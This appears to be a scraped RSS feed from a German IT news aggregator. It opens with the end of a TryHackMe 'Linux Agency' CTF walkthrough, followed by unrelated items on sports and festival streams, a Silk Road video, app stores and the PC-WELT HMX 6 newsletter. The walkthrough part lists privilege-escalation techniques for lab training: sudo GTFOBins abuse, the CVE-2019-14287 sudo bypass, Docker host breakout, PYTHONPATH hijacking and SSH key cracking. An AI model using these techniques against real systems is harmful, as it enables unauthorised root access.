Summary</h3><p>User Technique Category mission1–11 find / grep / cat Basic enumeration mission12 env Environment variables mission13 chmod File permissions mission14 base64 -d Encoding mission15 Binary → ASCII Encoding mission16 xxd -r -p (Hex) Encoding mission17 chmod u+x Execute permissions mission18 javac + java Java compilation mission19 ruby Scripting mission20 gcc C compilation mission21 python3 Scripting mission22 script -qc Restricted shell escape mission23 pty.spawn() Python interpreter escape mission24 curl + /etc/hosts Virtual hosting mission25 strings + .viminfo Binary analysis mission26 export PATH PATH manipulation mission27 strings on image Steganography mission28 less Long filename edge case mission29 exec in Ruby + .reverse Ruby escape + obfuscation mission30 grep -r in CMS File enumeration viktor git log Git history dalia Writable cron script Cron job exploitation silvio sudo zip GTFOBins reza sudo git + PAGER GTFOBins jordan PYTHONPATH hijack Module hijacking ken sudo less + ! GTFOBins sean sudo vim -c GTFOBins penelope Base64 password Encoded credentials maya SUID base64 SUID exploitation robert ssh2john + john SSH key cracking root (user.txt) sudo -u#-1 CVE-2019-14287 root (root.txt) docker run -v /:/mnt Docker breakout</p><h3>🧠 Key Takeaways</h3><p><strong>Linux Fundamentals:</strong></p><ul><li>ls -la always — hidden files, permissions at a glance</li><li>find and grep -r for wide enumeration</li><li>env for environment variable inspection</li><li>file to identify file types regardless of extension</li><li>strings to extract readable data from binaries</li></ul><p><strong>Encoding &amp; Decoding:</strong></p><ul><li>Base64 (base64 -d), Hex (xxd -r -p), Binary (Python one-liner)</li><li>Reversed strings — check file content and filenames alike</li></ul><p><strong>Scripting Languages:</strong></p><ul><li>Python: pty.spawn("/bin/bash") for shell upgrade</li><li>Ruby: exec "/bin/bash" or Dir/File for file ops</li><li>Java: javac → java, C: gcc → ./binary</li></ul><p><strong>Privilege Escalation Checklist:</strong></p><ol><li>sudo -l → GTFOBins</li><li>find / -perm -4000 2&gt;/dev/null → SUID binaries → GTFOBins</li><li>cat /etc/crontab + ls /etc/cron.d/ → writable scripts run by root</li><li>id → check group memberships (docker!)</li><li>Check $PATH, env variables, writable directories in PATH</li></ol><h3>📚 Resources</h3><ul><li>🔗 <a href="https://gtfobins.github.io/">GTFOBins</a> — sudo/SUID binary exploitation reference</li><li>🔗 <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadsAllTheThings — Reverse Shell Cheatsheet</a></li><li>🔗 <a href="https://www.exploit-db.com/exploits/47502">Exploit-DB: CVE-2019–14287</a></li><li>🔗 <a href="https://tryhackme.com/room/sudovulnsbypass">TryHackMe: Sudo Security Bypass</a></li><li>🔗 <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation">HackTricks: Docker Breakout</a></li><li>🔗 <a href="https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html">RapidTables Converter</a></li></ul><h3>💬 Final Thoughts</h3><p><strong>Linux Agency</strong> is not just a CTF room — it’s a condensed simulation of a real lateral movement and privilege escalation engagement. The 30-user chain forces you to internalize Linux enumeration as a reflex, not a checklist. The privilege escalation phase covers more ground than most dedicated PrivEsc rooms.</p><p>If you’re preparing for <strong>OSCP</strong>, <strong>CPTS</strong> or any practical security certification, this room belongs in your training regimen. Do it without hints first, refer to this write-up only when truly stuck — the struggle is where the learning happens.</p><p><em>Happy Hacking! 🐧</em></p><p><em>Tags: #TryHackMe #CTF #LinuxAgency #PrivilegeEscalation #Linux #Pentesting #CyberSecurity #OSCP #GTFOBins #WriteUp</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=82a20bd23d67" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-linux-agency-complete-write-up-walkthrough-82a20bd23d67">TryHackMe — Linux Agency | Complete Write-Up &amp; Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Formel 1: Rennen in Spa per TV oder Stream gratis live sehen]]></title>
<description><![CDATA[Die Formel 1 kommt nach Belgien. Sky, ServusTV und SRF übertragen das Event, RTL ist auch dabei. Wir verraten, wo Sie alle Grand-Prix-Sessions und das Rennen per TV oder Stream live schauen – auch kostenlos.]]></description>
<link>https://tsecurity.de/de/3675280/it-nachrichten/formel-1-rennen-in-spa-per-tv-oder-stream-gratis-live-sehen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675280/it-nachrichten/formel-1-rennen-in-spa-per-tv-oder-stream-gratis-live-sehen/</guid>
<pubDate>Fri, 17 Jul 2026 09:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Formel 1 kommt nach Belgien. Sky, ServusTV und SRF übertragen das Event, RTL ist auch dabei. Wir verraten, wo Sie alle Grand-Prix-Sessions und das Rennen per TV oder Stream live schauen – auch kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[Tomorrowland 2026: So seht ihr das Techno-Festival im Stream]]></title>
<description><![CDATA[In weniger als 24 Stunden öffnet das legendäre EDM-Festival wieder seine Tore in Belgien, doch die Tickets sind schon längst ausverkauft. Doch der offizielle Live-Stream schafft Abhilfe. 
																					Dieser Artikel wurde einsortiert unter 
																	Live-Streams,																	F...]]></description>
<link>https://tsecurity.de/de/3675013/it-nachrichten/tomorrowland-2026-so-seht-ihr-das-techno-festival-im-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675013/it-nachrichten/tomorrowland-2026-so-seht-ihr-das-techno-festival-im-stream/</guid>
<pubDate>Fri, 17 Jul 2026 06:03:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In weniger als 24 Stunden öffnet das legendäre EDM-Festival wieder seine Tore in Belgien, doch die Tickets sind schon längst ausverkauft. Doch der offizielle Live-Stream schafft Abhilfe. 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/video/index.html">Live-Streams</a>,																	<a href="https://www.netzwelt.de/festivals-internet/index.html">Festivals 2026 im Live-Stream: So seid ihr bei den besten Konzerten kostenlos in der ersten Reihe</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/downloads/festival-apps.html">Festival- und Event-Apps</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Jagd nach dem ersten König des Darknets]]></title>
<description><![CDATA[Author: Simplicissimus - Bewertung: 4738x - Views:48100 Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbun...]]></description>
<link>https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674538/it-security-nachrichten/die-jagd-nach-dem-ersten-koenig-des-darknets/</guid>
<pubDate>Thu, 16 Jul 2026 21:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Simplicissimus - Bewertung: 4738x - Views:48100 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YTkBmxfcFfg?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Mit Shopify kannst du deinen eigenen Shop im Handumdrehen aufsetzen und das Design individuell an deine Marke anpassen. Sidekick hilft dir, dein Business effizient zu verwalten. Teste Shopify kostenlos unter https://shopify.de/simpli (Werbung)<br />
<br />
Die Jagd auf den „Dread Pirate Roberts“, tausende gestohlene Bitcoin und ein Sündenbock, der fast die ganze Schuld getragen hätte. Das ist die Geschichte der Ermittler hinter dem Silk Road-Fall.<br />
<br />
Ein besonderer Dank geht an Nick Bilton und sein Buch „American Kingpin: The Epic Hunt for the Criminal Mastermind Behind the Silk Road“.<br />
<br />
<br />
Checkt Unfassbar ab: @unfassbar<br />
https://www.youtube.com/@UC9h7UoNb95t_b5A4eHmRnFw <br />
<br />
Spotify: https://spoti.fi/3Y1qYKJ<br />
Apple Podcasts: https://apple.co/4eToIMA<br />
Amazon Music: https://amzn.to/3Y7TEll<br />
RSS-Feed: https://anchor.fm/s/fc0e8c18/podcast/rss<br />
<br />
------<br />
<br />
Danke an unsere Patrons:   / simplicissimus  <br />
https://www.patreon.com/simplicissimus<br />
<br />
Simpli auf Instagram:   / simplicissimusyt  <br />
https://www.instagram.com/simplicissimusyt<br />
<br />
Simpli auf TikTok:   / simplicissimus<br />
https://www.tiktok.com/@simplicissimus<br />
<br />
<br />
Quellen:<br />
https://docs.google.com/document/d/1fPiySfmprfR4YyKA3gaNakYRC2m_v8S_Z8MgnJcRSYo/edit?tab=t.0<br />
<br />
<br />
Musik:<br />
Epidemic Sound:<br />
Behind the Shadow - Ruiqi Zhao<br />
Kansas - Christian Andersen<br />
Long Way Home - Aiyo<br />
Temporarily Virtual - Cobby Costa<br />
Voigt-Kampff - Martin Baekkevold<br />
Beacons - Cobby Costa<br />
The Sky Is Closing In - Cobby Costa<br />
Detour Switch - Cobby Costa<br />
Red Alert - Lennon Hutton<br />
Strange Interference - Cobby Costa<br />
The Shadow - Christoffer Moe Ditlevsen<br />
Impasse - Silver Maple<br />
Now That's an Alarm! - Harry Edvino<br />
Riot in the Capital - Bonnie Grace<br />
The Mutants - Farrell Wooten<br />
Knee Deep - Blue Saga<br />
Suspiral - Anthony Earls<br />
Ghostly - Tigerblood Jewel<br />
Parallel Existence - Raymond Grouse<br />
Tracker - Christoffer Moe Ditlevsen<br />
Slow Discovery - Cobby Costa<br />
<br />
Artlist:<br />
Oliver Michael - Witness - Extended version<br />
Sebastian Borromeo - See Through the Crack<br />
Morphlexis - Submarine<br />
IamDayLight - Hypnotize<br />
Artlist Musical Logos - Tensive Logo 1<br />
Or Chausha - Are You Still Alive - No Strings<br />
Ian Post - Mayhem<br />
Isaac DaBom - Keep Your Eyes Open<br />
Risian - Mission Critical<br />
Or Chausha - No Decides<br />
Stanley Gurvich - Transmission<br />
Oran Alaloof - Dark Apoko<br />
<br />
Lens Distortions:<br />
Riptide - No Pulse<br />
Tempered<br />
Why Be Normal - No High Percussion<br />
Force Multiplier - No High Percussion<br />
<br />
<br />
<br />
_____<br />
<br />
Schön, verständlich, kritisch und fundiert. Wir machen Essays zu Fragen, die du dir noch nie, oder viel zu oft gestellt hast.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Macht der App Stores]]></title>
<description><![CDATA[Author: The Morpheus - Bewertung: 23x - Views:122 Habt ihr euch mal gefragt, warum immer alles über Play Store oder App Store laufen muss?

[Werbung] 
Hier geht's zu unserem Partner Internxt:
https://internxt.com/themorpheus
Spart volle 85% auf den Lifetimeplan mit meinem Code THEMORPHEUS

MorphR...]]></description>
<link>https://tsecurity.de/de/3674013/video/die-macht-der-app-stores/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674013/video/die-macht-der-app-stores/</guid>
<pubDate>Thu, 16 Jul 2026 17:40:48 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: The Morpheus - Bewertung: 23x - Views:122 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/cHhTPHlPyDI?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Habt ihr euch mal gefragt, warum immer alles über Play Store oder App Store laufen muss?<br />
<br />
[Werbung] <br />
Hier geht's zu unserem Partner Internxt:<br />
https://internxt.com/themorpheus<br />
Spart volle 85% auf den Lifetimeplan mit meinem Code THEMORPHEUS<br />
<br />
MorphReader im PlayStore: https://play.google.com/store/apps/details?id=de.themorpheus.morph_reader_app&hl=de<br />
<br />
MorphReader im App Store: https://apps.apple.com/de/app/morphreader/id6741467699?platform=iphone<br />
<br />
RSS-Feed: https://www.patreon.com/collection/880029?view=expanded<br />
<br />
Bootstrap Academy: https://bootstrap.academy/<br />
https://github.com/Bootstrap-Academy/<br />
<br />
Instagram: https://www.instagram.com/themorpheustuts/<br />
<br />
Quellen:<br />
https://kdrive.infomaniak.com/app/share/1794086/cb8e96a1-d598-4f6d-944c-a832688b26c2<br />
<br />
Meine anderen Kanäle und Projekte: the-morpheus.de/<br />
<br />
_Selbst *kostenlos Informatik lernen* auf meiner Website:_ https://bootstrap.academy/<br />
<br />
_Discord:_<br />
https://the-morpheus.de/discord.html<br />
<br />
_Unterstützt mich - Danke!:_<br />
https://www.patreon.com/user?u=5322110<br />
https://www.paypal.me/TheMorpheus<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HMX 6: AMD-CPU, Balkonkraftwerk und die 30.000-Euro-Höllenmaschine von 2008]]></title>
<description><![CDATA[Hallo, ich bin der Michi, willkommen zur dritten Ausgabe des HMX-6-Newsletters. Diese Woche verraten wir endlich, welcher Prozessor die HMX 6 antreibt, und klären wichtige Fragen zur Höllenmaschine in unserer FAQ. Außerdem reisen wir zurück ins Jahr 2008, als die Höllenmaschine 3 mit einem Gesamt...]]></description>
<link>https://tsecurity.de/de/3673982/it-nachrichten/hmx-6-amd-cpu-balkonkraftwerk-und-die-30000-euro-hoellenmaschine-von-2008/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673982/it-nachrichten/hmx-6-amd-cpu-balkonkraftwerk-und-die-30000-euro-hoellenmaschine-von-2008/</guid>
<pubDate>Thu, 16 Jul 2026 17:33:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hallo, ich bin der Michi, willkommen zur dritten Ausgabe des HMX-6-Newsletters. Diese Woche verraten wir endlich, welcher Prozessor die HMX 6 antreibt, und klären wichtige Fragen zur Höllenmaschine in unserer FAQ. Außerdem reisen wir zurück ins Jahr 2008, als die Höllenmaschine 3 mit einem Gesamtwert von 30.000 Euro einen Rekord aufstellte. Wenn ihr keine Ausgabe verpassen wollt, könnt ihr den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">Newsletter kostenlos abonnieren</a> – aber vergesst nicht, die Anmeldung via E-Mail zu bestätigen. Viel Spaß beim Lesen!</p>



<p>Hier geht es direkt <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">zum Gewinnspiel der HMX 6 im Gesamtwert von 40.000 Euro</a>. </p>



<h2 class="wp-block-heading toc">Neuer Leak, CPU und Balkonkraftwerk der HMX 6 vorgestellt</h2>



<p>Die internen Leaks hören nicht auf, jetzt hat Jérémie auch noch durchgestochen, dass wir einen <a href="https://www.youtube.com/shorts/Zq1xXF5DkCM" target="_blank" rel="noreferrer noopener">Tisch-PC im Helo-Style</a> bauen. Ich habe mit dem Kollegen schon ein ernstes Wörtchen gesprochen – jetzt sollte erst einmal nichts mehr durchsickern.</p>



<p>Einige von euch hatten vielleicht auf einen Threadripper gehofft. Für eine Höllenmaschine steht aber maximale Gaming-Leistung an erster Stelle – deshalb fiel unsere Wahl auf den aktuell schnellsten Gaming-Prozessor von AMD. Aber keine Angst, auch für professionelle Anwendungen wie 3D-Rendering, Softwareentwicklung, Simulationen oder KI-Workloads bringt der AMD Ryzen 9 9950X3D2 Dual Edition genug Rechenleistung mit. Hier findet ihr alle Informationen zur <a href="https://www.pcwelt.de/article/3186713/die-cpu-der-hoellenmaschine-hmx-6-amd-ryzen-9-9950x3d2-dual-edition.html" target="_blank" rel="noreferrer noopener">HMX-6-CPU</a> – inklusive des Wakü-Blocks.</p>



<p>Ein Thema, das mich seit der ersten Höllenmaschine verfolgt, ist der hohe Stromverbrauch. Zu den klassischen Kommentaren aus der Community gehört das eigene Atomkraftwerk, das für den Betrieb notwendig ist. Aber wir gehen ja mit der Zeit, deswegen kommt die HMX 6 mit dem Balkonkraftwerk <a href="https://www.pcwelt.de/article/3186915/das-balkon-kraftwerk-der-hoellenmaschine-hmx-6-zendure-solarflow-2400-pro-und-vier-515w-pv-module.html" target="_blank" rel="noreferrer noopener">Zendure SolarFlow 2400 Pro</a>, das mit seinen vier PV-Modulen fast 2700 Watt Peak bietet. Zum System gehört außerdem ein 2,4-kWh-Akku, damit der Gewinner der HMX 6 den tagsüber erzeugten Strom auch abends oder nachts nutzen kann. Dass ich irgendwann einmal ein Balkonkraftwerk zu einer Höllenmaschine legen würde, hätte ich vor 20 Jahren übrigens selbst nicht geglaubt – da kam der Strom noch aus der Steckdose und war noch vergleichsweise günstig.</p>



<p>Ihr habt Fragen zur aktuellen Höllenmaschine? Dann helfen euch unsere <a href="https://www.pcwelt.de/3189780" target="_blank" rel="noreferrer noopener">HMX-6-FAQ</a> bestimmt weiter. Und wenn ihr sehen wollt, was hinter den Kulissen passiert, schaut auch mal bei <a href="https://www.instagram.com/pcwelt">Instagram</a> vorbei – dort tanzt aktuell der Bär im Kettenhemd. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58f989ed889"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HMX-6-Odyssee-Michi-und-Kriss-600.jpg?quality=50&amp;strip=all" alt="HMX 6: Odyssee Michi und Kris" class="wp-image-3191704" width="600" height="750" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Rückblick: Die Höllenmaschine 3 war 30.000 Euro wert – Rekord</h2>



<p>Mein Lieblingsspruch „Nach der Höllenmaschine ist vor der Höllenmaschine” hat hier seinen Ursprung: Die rasant steigenden Teilnehmerzahlen beim Gewinnspiel erlaubten es mir, direkt nach der HM2-Verlosung die Planung für die dritte Höllenmaschine anzugehen. So konnte ich die öffentlichen Auftritte der HM3 auf den Computer-Messen CeBIT und Hobbytronic generalstabsmäßig planen. </p>



<p>Heiko wurde wieder mit einem Casemod beauftragt, für die Bemalung sorgte die damalige Szenengröße „old_airbrush“. Das HM3-Gehäuse kostete insgesamt 6000 Euro. Die Kosten in die Höhe trieben auch das erstmals eingeführte Software-Paket für 5000 Euro und der Profi-Monitor Eizo SX3031W für 2500 Euro. Den Löwenanteil verschlang allerdings die zentrale Hardware:</p>



<p>Die HDDs kosteten inklusive Adaptec-Controller über 4000 Euro. Die beiden Intel Core 2 Extreme QX9775 waren mit 2600 Euro kostspieliger als die beiden Dual-GPU-Karten Nvidia Geforce 9800 GX2 – das waren noch Zeiten. Der innovative Phasenwechselkühler von Coolit Systems war mit 4000 Euro auch kein Schnäppchen, <a href="https://www.youtube.com/watch?v=ubLywx2rn5c" target="_blank" rel="noreferrer noopener">hat aber funktioniert</a>. Als ich damals die Kalkulation fertig hatte, musste ich selbst zweimal hinschauen. 30.000 Euro für einen PC – das war 2008 schon ziemlich verrückt.</p>



<p>Wer noch mehr über die dritte Höllenmaschine erfahren will, etwa über den Netzteil-Prototypen von Thermaltake mit 2000 Watt, sollte den Beitrag “<a href="https://www.pcwelt.de/article/3161751/vor-18-jahren-hoellenmaschine-3-gewinnen-sie-den-30-000-euro-pc.html" target="_blank" rel="noreferrer noopener">Vor 18 Jahren: Die Höllenmaschine 3 </a>” lesen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58f989ee44b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HM-3-02.jpg?quality=50&amp;strip=all" alt="PC-WELT Höllenmaschine 3" class="wp-image-3191709" width="600" height="800" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Hoellenmaschien e 3 aus dem Jahr 2008</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Nvidia bringt neue Karten auf den Markt, RAM bleibt bis 2030 teuer</h2>



<p>Will uns Nvidia trollen? Mit den „<a href="https://www.pcwelt.de/article/3188357/nvidia-bringt-neue-karten-auf-den-markt-die-sich-wirklich-jeder-leisten-kann-trading-cards.html#">GeForce Trading Cards: Series 1</a>“ hat Nvidia Sammelkarten vorgestellt, auf denen unter anderem historische Grafikkarten abgebildet sind – echte, bezahlbare Grafikkarten wären mir lieber. </p>



<p>Indirekt auf Nvidias Kappe gehen auch die galoppierenden Speicherpreise. Laut der koreanischen Branchenwebsite The Elec wird sich daran wohl <a href="https://www.thelec.net/news/articleView.html?idxno=11059">bis 2030 nichts ändern</a>. Erst dann könne das Angebot die Nachfrage befriedigen. Die Prognosen beruhen auf aktuellen Zahlen, wonach die Kunden derzeit das vier- bis fünffache des Angebots fordern. Erst 2030 könnte die Produktion damit Schritt halten – oder die KI-Blase platzt schon vorher.</p>



<p>Schon wieder Lego: Im Subreddit <a href="https://www.reddit.com/r/Legoleak/comments/1usqc4r/mario_72051_donkey_kong_arcade_set_image_via/">Legoleak</a> ist ein Bausatz für den Arcade-Automaten “Donkey Kong” aufgetaucht. Ich weiß noch, wie ich damals als Schüler mit Donkey Kong so manche Mark verdaddelt habe. Laut dem Reddit-Post soll der Bausatz – falls das kein KI-generierter Fake ist – aus 1367 Bauteilen bestehen und 200 Dollar kosten. Shut up and take my money.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a58f989eecf1"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Donkey-Kong-Arcade-600.jpg?quality=50&amp;strip=all" alt="Donkey Kong Arcade " class="wp-image-3191889" width="600" height="785" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><a href="https://www.reddit.com/r/Legoleak/" target="_blank" class="imageCredit" rel="noopener">Reddit</a></div>



<p>Aktuell läuft übrigens auf unserer Website die “PC-WELT Upgrade-Woche”, mit Ratgebern, Tipps und Kaufberatungen rund um das Thema Upgrade. <a href="https://www.pcwelt.de/upgrade-week" target="_blank" rel="noreferrer noopener">Schaut gerne vorbei</a>.</p>



<h2 class="wp-block-heading toc">Vielen Dank fürs Lesen!</h2>



<p>Kommende Woche steht ein Termin an, auf den ich mich besonders freue: Gemeinsam mit Kris besuche ich unseren Modder Stefan. Ich bin gespannt, wie weit der Bau des Tisch-PCs inzwischen fortgeschritten ist. Außerdem reisen wir zurück ins Jahr 2012 zur Höllenmaschine 4. Wenn ihr nichts verpassen wollt, abonniert den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">kostenlosen HMX-6-Newsletter</a> – und denkt daran, eure Anmeldung per E-Mail zu bestätigen. Ich freue mich, wenn ihr nächste Woche wieder dabei seid. Bis dahin wünsche ich euch eine gute Zeit! Euer Michi.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: Spanien gegen Argentinien kostenlos live im TV und Stream?]]></title>
<description><![CDATA[WM 2026, das große Finale: Wer wird Weltmeister? Gibt es das Endspiel zwischen Spanien und Argentinien gratis live im TV und Stream?]]></description>
<link>https://tsecurity.de/de/3673876/it-nachrichten/wm-2026-spanien-gegen-argentinien-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673876/it-nachrichten/wm-2026-spanien-gegen-argentinien-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Thu, 16 Jul 2026 17:02:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WM 2026, das große Finale: Wer wird Weltmeister? Gibt es das Endspiel zwischen Spanien und Argentinien gratis live im TV und Stream?]]></content:encoded>
</item>
<item>
<title><![CDATA[HMX 6 FAQ: Die wichtigsten Fragen und Antworten zur neuen Höllenmaschine 2026 geklärt]]></title>
<description><![CDATA[HMX 6
					Alle Infos zur HMX 6 und wie ihr sie gewinnen könnt
					Gesamtwert: über 40.000 Euro
				
				Erfahren Sie mehr
			
		
		


Mit der HMX 6 kehrt das bekannteste Hardware-Projekt von PC-WELT zurück. Doch was genau ist die sogenannte Höllenmaschine eigentlich, welches Thema verfolgt die ...]]></description>
<link>https://tsecurity.de/de/3673832/it-nachrichten/hmx-6-faq-die-wichtigsten-fragen-und-antworten-zur-neuen-hoellenmaschine-2026-geklaert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673832/it-nachrichten/hmx-6-faq-die-wichtigsten-fragen-und-antworten-zur-neuen-hoellenmaschine-2026-geklaert/</guid>
<pubDate>Thu, 16 Jul 2026 16:47:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



		<div class="promo_wrap promo_wrap_sticky">
			<div class="row_wrapper">
				<div class="column_wrapper">
					<p class="eyebrow">HMX 6</p>
					<p class="promo-title"><strong>Alle Infos zur HMX 6 und wie ihr sie gewinnen könnt</strong></p>
					<p class="promo-description">Gesamtwert: über 40.000 Euro</p>
				</div>
				<div class="more_btn"><a href="https://www.pcwelt.de/hmx" target="_blank" class="sticky-promotion-view-deal-link" data-vars-link-position="Floating Conversion Unit">Erfahren Sie mehr</a></div>
			</div>
		</div>
		


<p>Mit der HMX 6 kehrt das bekannteste Hardware-Projekt von PC-WELT zurück. Doch was genau ist die sogenannte Höllenmaschine eigentlich, welches Thema verfolgt die diesjährige Generation und wie kann man am Gewinnspiel teilnehmen?</p>



<p>In diesem FAQ beantworten wir die wichtigsten Fragen rund um das Projekt, die Videoserie, die verbaute Hardware und den Gesamtwert der HMX 6. Der Artikel wird im Verlauf des Projekts regelmäßig aktualisiert, sobald neue Details feststehen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading">Was ist die Höllenmaschine?</h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
